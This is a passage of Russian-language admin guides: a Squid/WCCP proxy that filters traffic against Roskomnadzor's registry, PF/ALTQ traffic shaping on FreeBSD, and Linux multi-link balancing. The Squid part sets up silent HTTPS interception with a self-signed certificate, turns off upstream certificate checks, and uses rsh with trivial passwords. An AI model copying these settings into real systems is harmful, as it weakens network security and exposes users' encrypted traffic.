WCCP_SQUID_PROXY +++ access-list 10 permit 1.1.2.2 Создаем пользователя, который будет грузить access-листы и настраиваем rsh. username blocker privilege 15 password password no ip rcmd domain-lookup ip rcmd rsh-enable ip rcmd remote-host blocker 1.1.2.2 root enable Ставим из портов SQUID. При выборе опций обязательно контролируем, что WCCP и WCCP2 протоколы включены. Создаем конфиг (в примере для версии 3.2) /usr/local/etc/squid/squid.conf http_port 1.1.2.2:9090 http_port 1.1.2.2:3128 transparent https_port 1.1.2.2:3129 transparent ssl-bump generate-host-certificates=on dynamic_cert_mem_cache_size=4MB cert=/usr/local/etc/squid/squid.pem always_direct allow all ssl_bump allow all sslproxy_cert_error allow all sslproxy_flags DONT_VERIFY_PEER sslcrtd_program /usr/local/libexec/squid/ssl_crtd -s /var/squid/ssl_db -M 4MB icp_port 0 hierarchy_stoplist cgi-bin ? acl QUERY urlpath_regex cgi-bin \\? cache deny QUERY acl apache rep_header Server ^Apache cache_mem 1 MB cache_swap_low 90 cache_swap_high 95 maximum_object_size 1 KB maximum_object_size_in_memory 50 KB cache_replacement_policy heap LFUDA cache_dir ufs /var/squid/cache 1 1 1 no-store logfile_rotate 7 dns_nameservers 8.8.8.8 8.8.4.4 hosts_file /etc/hosts refresh_pattern ^ftp: 1440 20% 10080 refresh_pattern ^gopher: 1440 0% 1440 refresh_pattern . 0 20% 4320 quick_abort_min 0 KB quick_abort_max 0 KB half_closed_clients off acl purge method PURGE acl CONNECT method CONNECT acl SSL_ports port 443 acl Safe_ports port 80 acl Safe_ports port 443 # https acl Safe_ports port 1025-65535 # unregistered ports http_access allow manager localhost http_access deny manager http_access allow purge localhost http_access deny purge http_access deny !Safe_ports http_access deny CONNECT !SSL_ports http_access allow localhost http_access allow all http_reply_access allow all icp_access allow all cache_mgr info@my.domain cache_effective_group proxy memory_pools off log_icp_queries off cachemgr_passwd q1w2e3r4 all client_db off buffered_logs on wccp2_router 1.1.2.1 wccp2_forwarding_method 2 wccp2_return_method 2 wccp2_assignment_method 2 wccp2_service dynamic 0 wccp2_service_info 0 protocol=tcp flags=dst_ip_hash,dst_port_hash priority=240 ports=80 wccp2_service dynamic 70 wccp2_service_info 70 protocol=tcp flags=dst_ip_hash,dst_port_hash priority=240 ports=443 wccp2_address 1.1.2.2 redirect_program /usr/local/etc/squid/redirector.pl url_rewrite_children 20 startup=10 idle=1 concurrency=0 Обратите внимание на строки wccp2_router и wccp2_address. Соответственно тут должны быть адреса на интерфейсе со стороны CISCO и SQUID. Трафик на сервер SQUID посылается путем замены MAC-адреса, без организации дополнительного GRE-тунеля. Скрипт редиректора копируется в /usr/local/etc/squid/: #!/usr/bin/perl use IO::Handle; use POSIX qw(strftime); use POSIX qw(setsid); my $db_path = "/var/db/zapret-info/"; my $block_url = "http://my.domain/block/"; my $log_file = "/var/log/squid/redirector.log"; $0 = 'redirect' ; $| = 1 ; my @banners ; my @X ; my $serial =0; sub _log { my $log_str = shift; my $now_str = strftime "%d-%m-%Y %H:%M:%S", localtime; printf(FLOG "[%s] %s\\n", $now_str, $log_str); } sub _rule_refresh { open(SER ,"${db_path}/serial"); read(SER,$num,6); close(SER); if (length($num)==0) { $num=0; } if ($num > $serial) { _log("Reading file ${db_path}/denied.conf serial ${num}"); open (IN_FILE, "${db_path}/denied.conf") || die $!; my @tmp_data = <IN_FILE>; chomp @tmp_data; @banners=(); push @banners, map { qr /\\Q$_\\E/ } grep { ! /^\\s*$/ } @tmp_data; close(IN_FILE); $serial=$num; } } $SIG{INT} = \\&_rule_refresh; open(FLOG, ">>${log_file}"); $| = 1 ; FLOG->autoflush(1); _log("Redirector started."); while (<>) { chomp ; @X = split ; ($url, $who, $ident, $method) = @X ; _rule_refresh ; $url = $block_url if grep ($url=~/$_/i, @banners) ; print "$url $who $ident $method\\n" ; } _log("Redirector exited."); close(FLOG); exit 0; В начале данного файла мы должны установить значение переменных $db_path, $block_url, $log_file в соответствии с Вашими настройками. $db_path содержит путь до директории с файлом denied.conf и serial, $block_url должен содержать адрес страницы на которую мы перекидываем клиента при блокировании ресурса. Что бы анализировать HTTPS-трафик, нам нужно сгенерировать самоподписанный сертификат: cd /usr/local/etc/squid/ openssl req -new -newkey rsa:1024 -days 365 -nodes -x509 -keyout squid.pem -out squid.pem Запускаем SQUID. Если все настроено верно, то на CISCO по команде sh ip wccp, мы увидим что-то похожее на такое: #sh ip wccp Global WCCP information: Router information: Router Identifier: 1.1.1.1 Protocol Version: 2.0 Service Identifier: 0 Number of Service Group Clients: 1 Number of Service Group Routers: 1 ... Redirect access-list: WCCP_REDIRECT ... Service Identifier: 70 Number of Service Group Clients: 1 Number of Service Group Routers: 1 ... Redirect access-list: WCCP_REDIRECT ... Если соединение WCCP2 установилось, мы может попробовать запустить трафик на SQUID. Для этого в ipfw мы должны поставить правила переадресации трафика : ipfw add 100 fwd 1.1.2.2,3128 tcp from not me to any dst-port 80 via ${wccp_intf} in ipfw add 100 fwd 1.1.2.2,3129 tcp from not me to any dst-port 443 via ${wccp_intf} in (где ${wccp_intf} - интерфейс для обмена wccp-трафиком) На CISCO запускаем трафик на SQUID : conf t int vlan90 ip wccp 0 redirect in ip wccp 70 redirect in Для загрузки acl в CISCO поднимаем tftp-сервер, раскомментировав соответствующую строку в /etc/inetd.conf и перезапустив inetd . Проверяем загрузку правил по rsh, выполнив из консоли сервера : ( sleep 2 ; echo '' ; sleep 15 ) | rsh -l blocker 1.1.2.1 copy tftp://1.1.2.2/block.acl running-config ; Проверяем в CISCO что правила загрузились. Если все отлично, создаем скрипт, который мы включаем в на выполнение в крон : #!/bin/sh . /var/db/zapret-info/cfg/loader.conf /scripts/download.pl if [ $? -eq 0 ]; then /scripts/xml-parser.pl else exit 254 ; fi if [ $? -eq 0 ]; then ( sleep 2 ; echo '' ; sleep 15 ) | rsh -l blocker ${cisco_address} copy tftp://${tftp_address}/block.acl running-config ; else exit 253 ; fi exit 0; Создадим файл конфигурации скрипта в /var/db/zapret-info/cfg/loader.conf echo 'cisco_address="1.1.2.1"' > /var/db/zapret-info/cfg/loader.conf echo 'tftp_address="1.1.2.2"' >> /var/db/zapret-into/cfg/loader.conf Если Вы все сделали без ошибок и поняли идею, Вы получили работающий полностью в автоматическом режиме сервер фильтрации трафика, синхронизированный с реестром Роскомнадзора, фильтрующий ВСЕ (!) ресурсы внесенные в реестр, в том числе URI написанные на русском языке и URI на защищенных SSL-ресурсах (для пользователя соединение отдаётся с использованием самоподписанного сертификата).

Маршрутизатор на базе FreeBSD с приоритизация трафика средствами PF и ALTQ Автор: artemrts [комментарии]

Проблема приоритизации трафика, на мой взгляд, весьма актуальна. Интернет-канала много не бывает и на всех пользователей и сервисов локальной зачастую не хватает. Поэтому для нормальной работы Интернета требуется грамотное распределения полосы с учетом потребностей каждого из участников. Единственный раз, когда мне не понадобился QoS - это гарантированный провайдером канал в 20 Мбит/с в мир и 100Мбит/с - национальный. Но такое удовольствие не из дешевых, поэтому зачастую народ довольствуется ADSL-каналом с заявленной скоростью к клиенту до 5-10 Мбит/с. Хочу заметить, что данная статья не предназначенная для новичков в сетевом администрировании в целом и в PF в частности. Читателю необходимо иметь минимальные навыки работы с сетями (понимать устройство пакета, знать что такое ТСР-флаги и т.д.), а также с пакетным фильтром PF. Не лишним будет прочесть официальный FAQ и man'ы. В основном цель этой статьи поделиться опытом, выслушать замечания и, возможно, улучшить свой вариант. И так, постановка задачи: организовать доступ к сети Интернет. Грамотно распределить как входящий так и исходящий трафик с разделением канала для клиентов локальной сети и сервисов, запущенных на самом роутере (например, FTP-сервер, SIP-сервер и т.д.). В качестве роутера выступает сервер с ОС FreeBSD 9 c пакетным фильром PF. Протокол FTP будет использоваться только в пассивном режиме, что немного упростит конфигурацию. Для решения поставленной задачи необходимо пересобрать ядро и включить в него поддержку PF и ALTQ. Для задач, не требующих ALTQ, пересобирать ядро не обязательно. Можно просто подгрузить PF как модуль. Добавляем в файл конфигурации следующие строки и пересобираем ядро. Описывать каждую опцию не буду. В man 4 altq все есть. options HZ=1000 device pf device pflog options ALTQ options ALTQ_CBQ options ALTQ_RED options ALTQ_RIO options ALTQ_HFSC options ALTQ_CDNR options ALTQ_PRIQ #options ALTQ_NOPCC #for SMP CPU Лично я для боевого сервера пересобираю не только ядро системы, но и мир. Как это сделать, хорошо описано в Хендбуке и /usr/src/Makefile. Для автоматического запуска PF при старте системы добавляем в /etc/rc.conf строки: pf_enable="YES" pflog_enable="YES" Далее, собственно, сам конфигурационный файл пакетного фильтра. Возьмем самую простую реализацию роутера: один внутренний сетевой интерфейс и один внешний. Интернет канал подключен через ADSL-модем, работающий в режиме моста, т.е. подключение pppoe организовано средствами штатного ppp-клиента. Скорость от провайдера - 5 Мбит/c, к провайдеру - 850 Кбит/c. На роутере запущен HTTP-прокси для прозрачного перенаправления WWW-трафика пользователей сети. Это сделано с целью блокировать метод CONNECT и принудительно направить другие виды трафика (например, торрент) в другие очереди с другим приоритетом. Я использую легковесный, но "шустрый" 3proxy (3proxy.ru). Кому важен кэш - используйте Squid или Apache Traffic Server. Также перенаправляются все ДНС-запросы на сервер ДНС-провайдера. Это сделано с целью блокировки фишинговых и других зловредных сайтов, сайтов для взрослых, аплоадеры, соц. сети и т.д. и т.п. Некоторые компании так же предоставляет блокировку рекламных баннеров. Весь исходящий трафик я разбил на следующие очереди: - ДНС-запросы - очередь u_dns - ТСР АСК-пакеты - очередь u_ack - трафик с высоким приоритетом - очередь u_hipri - трафик с нормальным приоритетом - очередь u_pri - трафик с низким приоритетом - очередь u_lowpri - весь остальной трафик - очередь u_other - стандартная очередь - очередь u_std, одна очередь должна быть с опцией default, в которую попадает трафик, который не попадает ни под какое другое правило. В нашем случае это показатель правильности назначения очередей в правилах фильтрации. В эту очередь ничего не должно попадать. Аналогичное деление трафика, идущего к клиенту локальной сети, только вместо u_* используется d_* обозначение. Трафик классифицируется как относительно сервиса/протокола (HTTP, FTP, Torrent) так и относительно пользователя, т.е. трафик от/к компьютера, например, бухгалтера может быть весь помечен как с высоким приоритетом, независимо от того Торрент это или FTP. Данные, являющиеся ДНС-запросам и ТСР АСК-пакетами, для всех пользователей имеют свой высокий неизменный приоритет. Например, весь трафик от/к компьютера, относящегося к группе с низким приоритетом, будет обрабатываться с низким приоритетом, кроме ДНС и ТСР АСК. Определяем макросы, что бы меньше текста в основной части конфигурационного файла. mst="modulate state" str="source-track rule" ext_if="tun0" int_if="rl0" Таблица, в которую включены компьютеры трафик к/от которых весь будет считаться с высоким приоритетом. table <pc_hipri> persist {10.11.1.2} Аналогично для ПК с нормальным приоритетом. table <pc_pri> persist {10.13.1.2 10.13.1.10 10.13.1.13 10.13.1.14 10.13.1.15} Таблица с адресами, доступ к которым блокируется. table <ban> persist file "/etc/pf.ban" Таблица, с адресами клиентов, которым можно доверять. table <trust> persist {123.10.456.0/24 193.196.125.0/24} IP-адрес системного администратора. table <me> persist {210.211.13.84} IP-адреса SIP-провайдеров table <sip_peers> persist {212.15.65.122 75.16.127.118} Конфигурируем опции пакетного фильтра, изменяющие его поведение. В нашем случае: - не производится проверка на интерфейсе обратной петли; - выставляем оптимизацию правил в basic; - устанавливаем привязку состояний соединения (т.н. стейтов) к каждому интерфейсу; - устанавливаем максимальное кол-во состояний. Если сетевых интерфейсов большое кол-во или большое кол-во клиентов в сети, возможно, потребуется скорректировать это значение в большую сторону. set skip on lo0 set ruleset-optimization basic set state-policy if-bound set limit states 20000 Нормализация трафика (т.н. скрабинг). Срабинг позволяет значительно повысить безопасность файервола. В нашем случае выполняется нормализация трафика на внешнем интерфейсе, генерируется случайная последовательность в поле идентификации IP-пакета, устанавливается величина TTL=128, производится "дефрагментация" IP-пакетов, а также нормализация TCP соединений. scrub on $ext_if all random-id no-df min-ttl 128 fragment reassemble reassemble tcp ALTQ. Приоритизировать будем на всех физических сетевых интерфейсах. На внешнем - исходящий трафик, на внутреннем - входящий. Выбор дисциплины - очень важный момент. Возможные варианты: priq, cbq, hfsc. Я использую hfsc, т.к. важной чертой этого планировщика есть именно гарантирование полосы для конкретного пользователя/сервиса. Работа планировщика для нашего конкретного случая построена следующим образом: если в описании очереди указан дополнительный параметр realtime, то ей будет отдана указанная (realtime) полоса независимо ни от чего. Величина трафика свыше realtime будет рассчитываться исходя из величины bandwidth. Причем bandwidth - не абсолютный параметр, скорее относительный. Исходя из величин bandwidth каждой очереди рассчитывается величина трафика свыше realtime для каждой очереди пока не будет достигнут параметр upperlimit, который жестко ограничивает полосу. Приоритеты в планировщике hfsc не используются. Помимо всех прочих параметров, hfsc имеет параметр qlimit - кол-во слотов, доступных очереди для сохранения исходящих пакетов, когда вся доступная полоса исчерпана. И только когда все слоты будут заняты, пакеты будут отбрасываться, что заставит клиента снижать скорость. Мы не будем использовать RED или ECN, вместо этого увеличим значение qlimit. Назначаем очередь на внешнем интерфейсе. Величина bandwidth должна быть 96% от предоставляемой вышестоящим роутером. Здесь же перечисляем все дочерние очереди. altq on $ext_if hfsc bandwidth 800Kb queue {u_std,u_ack,u_dns,u_hipri,u_pri,u_lowpri,u_other} Очередь по-умолчанию. Будет потреблять 25 кбит/с независимо ни от чего. Величина bandwidth 1Kb означает, что если канал будет полностью занят любой другой очередью или всеми, то очередь u_std практически ничего не получит свыше 25 кбит/с. queue u_std bandwidth 1Kb qlimit 50 hfsc (default realtime 25Kb) Очередь u_ack - это ТСР АСК-пакеты, которые будут отправляться удаленному хосту с которого происходит загрузка по протоколу ТСР. Важно, что бы эти пакеты проходили без задержек. Для максимальной скорости от провайдеоа 4 Мбит/с требуется гарантированный канал в обратную сторону в размере 125 кбит/с. queue u_ack bandwidth 1Kb qlimit 200 hfsc (realtime 125Kb) ДНС-запросы. Гарантированной полосы в 25 кбит/с вполне достаточно. Больше не нужно, поэтому bandwidth 1Kb queue u_dns bandwidth 1Kb qlimit 50 hfsc (realtime 25Kb) Очередь с высоким приоритетом queue u_hipri bandwidth 300Kb qlimit 250 hfsc (realtime 200Kb) Очередь с обычным приоритетом queue u_pri bandwidth 300Kb qlimit 400 hfsc (realtime 150Kb) Очередь с низким приоритетом queue u_lowpri bandwidth 100Kb qlimit 100 hfsc (realtime 75Kb) Очередь для всего остального трафика ТСР и UDP. queue u_other bandwidth 97Kb qlimit 50 hfsc (realtime 25Kb) Назначаем очереди на внутреннем интерфейсе - приоритизируем входящий трафик. Провайдер отдает 5 Мбит/с, поэтому устанавливаем очередь inetq в размере 96%. Так же на внутреннем интерфейсе запущен ряд служб, например, локальный FTP, поэтому важно "не смешать" локальный трафик с Интернет-трафиком. Так как сетевая карточка 100Mbit, то выставляем значение bandwidth в 100Mb. Назначаем две очереди: одна - локальный трафик, вторая Интернет-трафик с дочерними очередями. altq on $int_if hfsc bandwidth 100Mb queue {etherq, inetq} Очередь для локального трафика. В эту очередь будут попадать все пакеты, идущие от внутреннего сетевого интерфейса к пользователям локальной сети. Параметр upperlimit определяет максимальное значения для данной очереди. Заметьте, в эту очередь не будут попадать ответы, например, от WWW-сервера из сети Интернет. Эта очередь исключительно для локального трафика. queue etherq bandwidth 95Mb hfsc (upperlimit 95Mb) Очередь для Интернет-трафика. В эту очередь будут попадать пакеты, идущие с сети Интернет. Имеет дочерние очереди по аналогии с внешним интерфейсом. queue inetq bandwidth 4800Kb hfsc (upperlimit 4800Kb) {d_std,d_ack,d_dns,d_hipri,d_pri,d_lowpri,d_other} queue d_std bandwidth 1Kb qlimit 50 hfsc (default realtime 25Kb) queue d_ack bandwidth 1Kb qlimit 50 hfsc (realtime 50Kb) queue d_dns bandwidth 1Kb qlimit 50 hfsc (realtime 25Kb) queue d_hipri bandwidth 1297Kb qlimit 500 hfsc (realtime 1000Kb) queue d_pri bandwidth 2000Kb qlimit 500 hfsc (realtime 2000Kb) queue d_lowpri bandwidth 1000Kb qlimit 500 hfsc (realtime 500Kb) queue d_other bandwidth 500Kb qlimit 500 hfsc (realtime 240Kb) Правила трансляции локальных адресов (NAT). Транслируются адреса, где источник - IP-адрес из любой подсети внутреннего интерфейса, а адрес назначения - любой, кроме IP-адресов из всех подсетей, подключенных к роутеру. Это могут быть как физические так и VPN-интерфейсы (tun, gif). ($ext_if) - в круглых скобках, т.к. IP-адрес внешнего интерфейса назначается динамически. ($int_if:network) и (self) в круглых скобках что бы в выводе pfctl -sn не было подстановки реальных адресов и сетей. Это удобно, когда у вас на внутреннем интерфейсе несколько алиасов и, соответственно, подсетей (как в моем случае). nat on $ext_if inet from ($int_if:network) to !(self) -> ($ext_if) port 1024:65535 Пользователей из группы pc_hipri и pc_pri пускаем в обход прокси. Я пускаю их напрямую, т.к. эти пользователи не нуждаются в контроле, а также специфическое ПО не работает в режиме прозрачного проксирования. no rdr on $int_if inet proto tcp from {<pc_hipri> <pc_pri>} to !(self) port 80 Правило редиректа, перенаправляющие все ДНС-запросы локальных пользователей на внешний ДНС-сервер. Это может быть Google или, лучше, ДНС-сервер компании, предоставляющей фильтрацию трафика посредством ДНС. rdr on $int_if inet proto {tcp udp} from ($int_if:network) to !(self) port 53 -> 193.58.251.251 port 53 Редирект на прокси-сервер. rdr on $int_if inet proto tcp from ($int_if:network) to !(self) port 80 -> 127.0.0.1 port 31280 Редирект на удаленный рабочий стол виндовой машины в локальной сети из сети Интернет. rdr on $ext_if inet proto tcp from any to ($ext_if) port 3389 -> 10.11.1.2 port 3389 Правила фильтрации трафика. Правила будем группировать в такой последовательности: действие, интерфейс, направление, протокол, адрес источника, порт источника, адрес назначения, порт назначения. Антиспуфинг. antispoof quick for {$int_if lo0} inet Блокируем не маршрутизируемые адреса. block in quick inet from no-route to any Блокируем броадкасты. block in quick on $ext_if inet from any to 255.255.255.255 Блокируем IP-адреса, содержащиеся в таблице ban. Опция return возвращает TCP RST, что закрывает сразу соединение без таймаута. Полезно, когда блокируются адреса рекламных сетей, что позволяет браузеру нормально загружать странички без ожидания загрузки блокируемого контента. block return out quick on $ext_if inet from any to <ban> Эти 2 правила определяют тип файервола: запрещено все, кроме явно разрешенного. block in all block out all Собственно разрешающие правила. Расположены в определенной последовательности, что важно с точки зрения производительности, а также ожидаемого эффекта. Внутренний интерфейс. Разрешаем ТСР-пакеты к интерфейсу обратной петли, на котором "слушает" прокси- сервер для организации прозрачного проксирования. Назначаем очереди. Мы не можем приоритизировать входящий трафик, только исходящий. В d_pri будут попадать пакеты, которые являются ответом от сервера к клиенту, таким образом мы регулируем скорость скачивания. pass in log quick on $int_if inet proto tcp from ($int_if:network) to 127.0.0.1 port 31280 queue (d_pri, d_ack) Далее 3 правила, которые разрешают ТСР соединения на определенные порты на не локальные IP-адреса. Назначаются соответствующие очереди. Тегирование необходимо что бы потом на внешнем интерфейсе мы могли "отделить" его от остального трафика и направить в нужную очередь. Заметьте, опция quick не используется, поэтому эти правила нужно расположить в правильной последовательности: от менее ограничивающего к более, потому как без опции quick последнее совпавшее правило выигрывает, а не первое совпавшее. Опция quick не используется т.к. при совпадении пакет будет назначен в очередь и пропущен и не дойдет до тех правил, которые описывают разрешения и приоритеты, основанные не на протоколах, а на адресах источника/назначения (в нашем случае это компьютеры из группы pc_hipri и pc_pri). Т.к. протокол ТСР, то так же добавляем очередь для ТСР АСК-пакетов. В качестве адреса назначения в правилах фигурирует !(self:network). Это значит, что только пакеты, не предназначенные ни к одному IP-адресу сетевых интерфейсов или IP-адресу из подсетей, подключенных к роутеру, будут разрешаться и, соответственно, тегироваться. Это, например, не даст подключиться к внешнему IP из локальной сети. pass in log on $int_if inet proto tcp from ($int_if:network) to !(self:network) \\ $mst queue (d_other d_ack) tag INET_OTHER pass in log on $int_if inet proto tcp from ($int_if:network) to !(self:network) \\ port {20 21 25 110 143 5190 8080 081} $mst queue (d_lowpri d_ack) tag INET_LOWPRI pass in log on $int_if inet proto tcp from ($int_if:network) to !(self:network) \\ port 443 $mst queue (d_pri d_ack) tag INET_PRI Далее 2 правила, которые будут срабатывать как для всех пользователей так и для тех, кто принадлежит к т.н. VIP-группе (pc_hipri и pc_pri). Поэтому тут используем опцию quick. pass in log quick on $int_if inet proto tcp from ($int_if:network) to !(self:network) \\ port {22 3389} $mst queue (d_hipri d_ack) tag INET_HIPRI pass in log quick on $int_if inet proto tcp from ($int_if:network) to !(self:network) \\ port 53 $mst queue (d_dns d_ack) tag INET_DNS Следующие 2 правила, по-аналогии с TCP, описывают разрешения и очереди для протокола UDP. Так же их тегируем. Второе правило с опцией quick, т.к. оно должно срабатывать для всех категорий пользователей. pass in log on $int_if inet proto udp from ($int_if:network) to !(self:network) queue d_other tag INET_OTHER pass in log quick on $int_if inet proto udp from ($int_if:network) to !(self:network) \\ port {53 123} queue d_dns tag INET_DNS Правило, разрешающее ICMP. pass in log on $int_if inet proto icmp from ($int_if:network) to !(self:network) queue d_lowpri tag INET_LOWPRI Следующие правила, разрешающие трафик от клиентов, с высоким и нормальным приоритетом. Весь трафик будет считаться очень высоким (hipri) или высоким (pri) приоритетом (кроме ДНС и ТСР АСК). Здесь мы не указываем протокол, но указываем modulate state, который применяется только для ТСР. Это не будет ошибкой, PF достаточно "умный" и он подставит modulate state для протокола ТСР, и keep state - для всех остальных протоколов. pass in log quick on $int_if inet from <pc_hipri> to !(self:network) $mst queue (d_hipri, d_ack) tag INET_HIPRI pass in log quick on $int_if inet from <pc_pri> to !(self:network) $mst queue (d_pri, d_ack) tag INET_PRI Разрешаем локальный Ethernet к внутреннему интерфейсу роутера. pass in quick on $int_if inet from ($int_if:network) to ($int_if) queue etherq Теперь опишем разрешающие правила с внутреннего интерфейса роутера в локальную сеть. Если у вас нет редиректа с Интернета в локальную сеть или нет никаких серверов/клиентов, запущенных на самом роутере и требующих доступ в локальную сеть, то эти правила можно не добавлять. Первое правило разрешает трафик с Интернета к указанному IP в локальной сети и назначает очень высокий приоритет входящего трафика. Это третье правило (первое - rdr, второе - разрешающее на внешнем интерфейсе) для редиректа (проброса) порта в локальную сеть. pass out quick on $int_if inet proto tcp from !(self) to 10.11.1.2 port 3389 queue (d_hipri d_ack) Правило, разрешающее трафик от внутреннего сетевого интерфейса роутера в локальную сеть. Не важно какой протокол. Весь направляется в очередь etherq. pass out quick on $int_if inet from ($int_if) to ($int_if:network) queue etherq Внешний интерфейс. Разрешающие правила для входящего трафика. Важно, для каждого входящего правило указывать максимальное кол-во стейтов, которые может создать правило. Это предотвратит исчерпывания всего лимита стейтов одним правилом в случае DoS атаки. Последующие 6 правил разрешают входящие ТСР-подключения к определенным портам роутера, а также назначаются соответствующие очереди. Эти очереди будут приоритизировать не входящий трафик, а исходящий. Так же стоит обратить внимание на первые два правила, которые разрешают доступ к FTP серверу на роутере. Передача команд по 21-му порту будет направляться в очередь с большим приоритетом (u_pri), а данные - с меньшим (u_lowpri). pass in quick on $ext_if inet proto tcp from <trust> to ($ext_if) port 21 $mst (max 100) queue (u_pri u_ack) pass in quick on $ext_if inet proto tcp from <trust> to ($ext_if) port >=49152 $mst (max 100) queue (u_lowpri u_ack) pass in quick on $ext_if inet proto tcp from <me> to ($ext_if) port 22 $mst (max 10) queue (u_hipri u_ack) pass in quick on $ext_if inet proto tcp from <me> to ($ext_if) port 80 $mst (max 100) queue (u_pri u_ack) pass in quick on $ext_if inet proto tcp from <me> to ($ext_if) port 5900 $mst (max 10) queue (u_hipri u_ack) Правило, разрешающее входящее подключение с сети Интернет (конкретно с адреса администратора), но не к интерфейсам роутера (внешнему в том числе), а к компьютеру в локальной сети к порту RDP. pass in quick on $ext_if inet proto tcp from <me> to !(self) port 3389 $mst (max 10) queue (u_hipri u_ack) Следующее правило разрешает подключение с любого адреса сети Интернет к VNC-репитеру. В целях безопасности включен трекинг источника (source-track). pass in quick on $ext_if inet proto tcp from any to ($ext_if) port 5500 $mst \\ (max 10,$str, max-src-nodes 2, max-src-states 3, max-src-conn-rate 3/60) \\ queue (u_hipri u_ack) Следующие 2 правила разрешают подключения к определенным портам по протоколу UDP. pass in quick on $ext_if inet proto udp from any to ($ext_if) port 1194 (max 20) queue u_pri pass in quick on $ext_if inet proto udp from <sip_peers> to ($ext_if) port 5060 (max 20) queue u_hipri Разрешаем пинг к внешнему интерфейсу. pass in quick on $ext_if inet proto icmp from any to ($ext_if) icmp-type echoreq (max 100) queue u_other Внешний интерфейс. Разрешающие правила для исходящего трафика. Следующие 5 правил разрешают исходящий трафик с внешнего интерфейса, который был помечен на внутреннем интерфейсе. Это исключительно данные, которые передаются в сеть Интернет от клиентов в локальной сети. pass out quick on $ext_if inet from ($ext_if) to any $mst queue (u_dns u_ack) tagged INET_DNS pass out quick on $ext_if inet from ($ext_if) to any $mst queue (u_hipri u_ack) tagged INET_HIPRI pass out quick on $ext_if inet from ($ext_if) to any $mst queue (u_pri u_ack) tagged INET_PRI pass out quick on $ext_if inet from ($ext_if) to any $mst queue (u_lowpri u_ack) tagged INET_LOWPRI pass out quick on $ext_if inet from ($ext_if) to any $mst queue (u_other u_ack) tagged INET_OTHER И последние правила, разрешающие исходящие соединения с внешнего интерфейса. Это будет трафик непосредственно самого роутера. В целом приоритет этого трафика выше чем от клиентов в локальной сети. pass out quick on $ext_if inet proto tcp from ($ext_if) to any port 53 $mst queue (u_dns u_ack) pass out quick on $ext_if inet proto tcp from ($ext_if) to any $mst queue (u_pri u_ack) pass out quick on $ext_if inet proto udp from ($ext_if) to any port {53 123} queue u_dns pass out quick on $ext_if inet proto udp from ($ext_if) to <sip_peers> port 5060 queue u_hipri pass out quick on $ext_if inet proto udp from ($ext_if) to any queue u_pri pass out quick on $ext_if inet proto icmp from ($ext_if) to any $mst queue u_lowpri Есть один важный момент, на котором остановлюсь подробнее. Второе правило будет разрешать ТСР-соединения с роутера и в том числе на 80 порт. Под это правило так же подпадают пакеты, отправленные с прокси-сервера, трафик, который фактически является HTTP-трафиком клиентов из локальной сети. Т.к. в нашем случае приоритеты этих видов трафика равны (очередь u_pri), то все хорошо. Но если планируется назначить очереди разные (например, HTTP от локальных клиентов - очередь u_lowpri, а с внешнего интерфейса роутера - u_pri), тогда следует указать в правиле для прокси-сервера опцию user uid и поместить его над правилом для внешнего интерфейса роутера. Например, прокси запущен с правами пользователя nobody: pass out quick on $ext_if inet proto tcp from ($ext_if) to any user nobody $mst queue (u_lowpri u_ack) pass out quick on $ext_if inet proto tcp from ($ext_if) to any $mst queue (u_pri u_ack) Соответственно, правило, разрешающее доступ к прокси из локалной сети тоже немного измениться: необходимо поменять очередь с d_pri на d_lowpri. pass in log quick on $int_if inet proto tcp from ($int_if:network) to 127.0.0.1 port 31280 queue (d_lowpri, d_ack) Стоить отметить о наличии бага, который проявляется при использованием опции user. Об этом описано в секции BUGS на странице руководства pf.conf. Лично у меня этот баг не проявлялся. Все же старайтесь опцию user не использовать. Отладка. Отличительной способностью PF есть его протоколирование, статистика и мониторинг состояния в реальном времени что значительно облегчает конфигурирование файервола, особенно для сложных сетевых топологий. Просмотр загруженных очередей: pfctl -sq Что бы в реальном времени наблюдать загрузку очередей выполните команду: pfctl -vvsq Так же рекомендую установить из портов программу pftop, которая по аналогии с утилитой top выводит различную статистику PF в реальном времени.

Балансировка трафика в Linux (доп. ссылка 1) Автор: mirage [комментарии]

Данная схема отслеживает новые соединения и равномерно распределяет их по каналам. Допустим есть 4 канала в интернет: Linux Router ISP |ppp0 10.0.0.1|-----|10.0.0.2| |ppp1 10.0.0.3|-----|10.0.0.3| |ppp2 10.0.0.5|-----|10.0.0.4| |ppp3 10.0.0.7|-----|10.0.0.5| Добавляем в файл /etc/iproute2/rt_tables таблицы: 108 sat2 109 sat3 110 sat4 Настраиваем маршруты (раскидываем трафик по таблицам в зависимости от nfmark): ip rule add prio 50 fwmark 1 table sat2 ip rule add prio 51 fwmark 2 table sat3 ip rule add prio 52 fwmark 3 table sat4 ip route add default via 10.0.0.2 dev ppp0 ip rule add prio 210 from 10.0.0.3 table sat2 ip route add default via 10.0.0.4 dev ppp1 table sat2 ip rule add prio 211 from 10.0.0.5 table sat3 ip route add default via 10.0.0.6 dev ppp3 table sat3 ip rule add prio 212 from 10.0.0.7 table sat4 ip route add default via 10.0.0.8 dev ppp4 table sat4 Деление по таблицам осуществляется iptables: iptables -t mangle -N NEW_OUT_CONN # Выбираем новые сессии iptables -t mangle -A PREROUTING -s 10.0.0.0/16 -m state --state NEW,RELATED -j NEW_OUT_CONN # Восстанавливает значение nfmark из CONNMARK iptables -t mangle -A PREROUTING -s 10.0.0.0/16 -j CONNMARK --restore-mark iptables -t mangle -A NEW_OUT_CONN -j CONNMARK --set-mark 0 # Каждый четвертый пакет iptables -t mangle -A NEW_OUT_CONN -m statistic --mode nth --every 4 -j RETURN iptables -t mangle -A NEW_OUT_CONN -j CONNMARK --set-mark 1 # Каждый третий пакет iptables -t mangle -A NEW_OUT_CONN -m statistic --mode nth --every 3 -j RETURN iptables -t mangle -A NEW_OUT_CONN -j CONNMARK --set-mark 2 # Каждый второй пакет iptables -t mangle -A NEW_OUT_CONN -m statistic --mode nth --every 2 -j RETURN iptables -t mangle -A NEW_OUT_CONN -j CONNMARK --set-mark 3 Модуль CONNMARK отслеживает метки для всех пакетов сессии, это значит, что если пометить пакет в сессии, то все пакеты принадлежащие ей будут иметь эту же метку. --restore-mark копирует метку в метку пакета 'nfmark'. По которой пакет попадает в соответствующую таблицу, и подвергается маршрутизации. -m statistic --mode nth --every N соответствует каждому N-нному пакету.

Распределение трафика между двумя каналами во FreeBSD (доп. ссылка 1) Автор: pehlle [комментарии]

